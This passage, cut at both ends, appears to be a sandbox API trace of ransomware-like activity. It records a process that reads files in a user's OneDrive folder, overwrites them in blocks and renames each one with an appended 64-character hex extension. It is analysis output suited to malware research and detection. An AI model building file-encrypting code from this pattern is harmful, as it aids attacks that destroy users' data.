ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0112.850] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png", lpString2=".7F2355EADF64AEC804DE89A157105A2BD3C211ADCE1F82AAA4A27F4CDA846363" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png.7F2355EADF64AEC804DE89A157105A2BD3C211ADCE1F82AAA4A27F4CDA846363") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png.7F2355EADF64AEC804DE89A157105A2BD3C211ADCE1F82AAA4A27F4CDA846363" [0112.850] GetProcessHeap () returned 0x600000 [0112.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x3186588 [0112.850] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x3186588, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0112.851] CloseHandle (hObject=0x334) returned 1 [0112.851] GetProcessHeap () returned 0x600000 [0112.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.852] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.857] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.857] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.862] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.863] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.873] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0112.874] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif", lpString2=".0DA40A2542D9A13CE3FC1A54053B3EC408C89E9FC185DFA20315EB4E8A089622" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif.0DA40A2542D9A13CE3FC1A54053B3EC408C89E9FC185DFA20315EB4E8A089622") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif.0DA40A2542D9A13CE3FC1A54053B3EC408C89E9FC185DFA20315EB4E8A089622" [0112.874] GetProcessHeap () returned 0x600000 [0112.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315cc28 [0112.874] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315cc28, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.896] CloseHandle (hObject=0x334) returned 1 [0112.896] GetProcessHeap () returned 0x600000 [0112.896] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.897] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.901] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.902] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.907] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.908] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0112.937] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0112.938] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll", lpString2=".354F0851CE8429860B7B197876508B7FFB6CF8BD997706ECF3E7F2FEEF170C31" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll.354F0851CE8429860B7B197876508B7FFB6CF8BD997706ECF3E7F2FEEF170C31") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll.354F0851CE8429860B7B197876508B7FFB6CF8BD997706ECF3E7F2FEEF170C31" [0112.938] GetProcessHeap () returned 0x600000 [0112.938] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x315cab0 [0112.938] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315cab0, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0112.939] CloseHandle (hObject=0x334) returned 1 [0112.939] GetProcessHeap () returned 0x600000 [0112.939] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.941] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.636] ReadFile (in: hFile=0x334, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0113.636] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.637] WriteFile (in: hFile=0x334, lpBuffer=0x32e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 1 [0113.637] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.638] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x2c7ff70) returned 0x0 [0113.638] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll", lpString2=".73CF1A22A37B2A45C99CD6539BAF814DB0FF8F77BCDAAFF495A69C609EFA8A52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll.73CF1A22A37B2A45C99CD6539BAF814DB0FF8F77BCDAAFF495A69C609EFA8A52") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll.73CF1A22A37B2A45C99CD6539BAF814DB0FF8F77BCDAAFF495A69C609EFA8A52" [0113.638] GetProcessHeap () returned 0x600000 [0113.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315c4d0 [0113.639] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315c4d0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0113.639] CloseHandle (hObject=0x334) returned 1 [0113.640] GetProcessHeap () returned 0x600000 [0113.640] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0113.642] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.683] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.684] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.684] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.685] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.685] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0113.686] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll", lpString2=".6E54485363E9F163FD4F5030435DB0ED1E97ED3A026A6DD5B358C2983344236C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll.6E54485363E9F163FD4F5030435DB0ED1E97ED3A026A6DD5B358C2983344236C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll.6E54485363E9F163FD4F5030435DB0ED1E97ED3A026A6DD5B358C2983344236C" [0113.686] GetProcessHeap () returned 0x600000 [0113.686] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x318ad38 [0113.686] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x318ad38, Length=0x174, FileInformationClass=0xa) returned 0x0 [0113.687] CloseHandle (hObject=0x334) returned 1 [0113.687] GetProcessHeap () returned 0x600000 [0113.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.688] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.746] ReadFile (in: hFile=0x310, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.747] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.747] WriteFile (in: hFile=0x310, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.750] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.751] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0113.751] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll", lpString2=".83A0DA2337BFE30956CAA558745077D0DFCB1A9777EB2490ACDDAF0BD9F0891C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll.83A0DA2337BFE30956CAA558745077D0DFCB1A9777EB2490ACDDAF0BD9F0891C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll.83A0DA2337BFE30956CAA558745077D0DFCB1A9777EB2490ACDDAF0BD9F0891C" [0113.752] GetProcessHeap () returned 0x600000 [0113.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x315c7c0 [0113.753] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x315c7c0, Length=0x166, FileInformationClass=0xa) returned 0x0 [0113.753] CloseHandle (hObject=0x310) returned 1 [0113.754] GetProcessHeap () returned 0x600000 [0113.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.755] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.879] WriteFile (in: hFile=0x310, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.880] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.880] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0113.881] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll", lpString2=".486EF5E5F94AF455FE9A48FDB074C373489AA01AE3A011750153F89A81A2D23E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll.486EF5E5F94AF455FE9A48FDB074C373489AA01AE3A011750153F89A81A2D23E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll.486EF5E5F94AF455FE9A48FDB074C373489AA01AE3A011750153F89A81A2D23E" [0113.881] GetProcessHeap () returned 0x600000 [0113.881] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315fc30 [0113.881] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x315fc30, Length=0x162, FileInformationClass=0xa) returned 0x0 [0113.882] CloseHandle (hObject=0x310) returned 1 [0113.882] GetProcessHeap () returned 0x600000 [0113.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.882] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.897] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.897] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.898] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0113.899] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll", lpString2=".EBA95E8E86A40C26A2556D2A0B6CC81258791346FB8CD64BDEE42F4DBE4FB118" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll.EBA95E8E86A40C26A2556D2A0B6CC81258791346FB8CD64BDEE42F4DBE4FB118") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll.EBA95E8E86A40C26A2556D2A0B6CC81258791346FB8CD64BDEE42F4DBE4FB118" [0113.899] GetProcessHeap () returned 0x600000 [0113.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x315eef8 [0113.899] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315eef8, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0113.911] CloseHandle (hObject=0x334) returned 1 [0113.911] GetProcessHeap () returned 0x600000 [0113.912] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.912] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.944] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.945] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.945] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.946] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.947] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0113.948] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll", lpString2=".CB788A79EF09A6C0A2FAE1D99ECF8C6B626220FA76BA5E1266FC1502B28A616A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll.CB788A79EF09A6C0A2FAE1D99ECF8C6B626220FA76BA5E1266FC1502B28A616A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SyncEngine.dll.CB788A79EF09A6C0A2FAE1D99ECF8C6B626220FA76BA5E1266FC1502B28A616A" [0113.948] GetProcessHeap () returned 0x600000 [0113.948] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x315f940 [0113.948] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315f940, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0113.949] CloseHandle (hObject=0x334) returned 1 [0113.949] GetProcessHeap () returned 0x600000 [0113.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.951] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.962] ReadFile (in: hFile=0x310, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.962] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0113.984] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0113.984] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll", lpString2=".8158EA3919B75B1F340E19789D7C30980112D57CD4B64DE079BBE1C164488A13" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll.8158EA3919B75B1F340E19789D7C30980112D57CD4B64DE079BBE1C164488A13") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll.8158EA3919B75B1F340E19789D7C30980112D57CD4B64DE079BBE1C164488A13" [0113.984] GetProcessHeap () returned 0x600000 [0113.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x168) returned 0x315fda8 [0113.984] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x315fda8, Length=0x168, FileInformationClass=0xa) returned 0x0 [0113.993] CloseHandle (hObject=0x310) returned 1 [0113.993] GetProcessHeap () returned 0x600000 [0113.993] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.996] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0114.071] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.071] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: 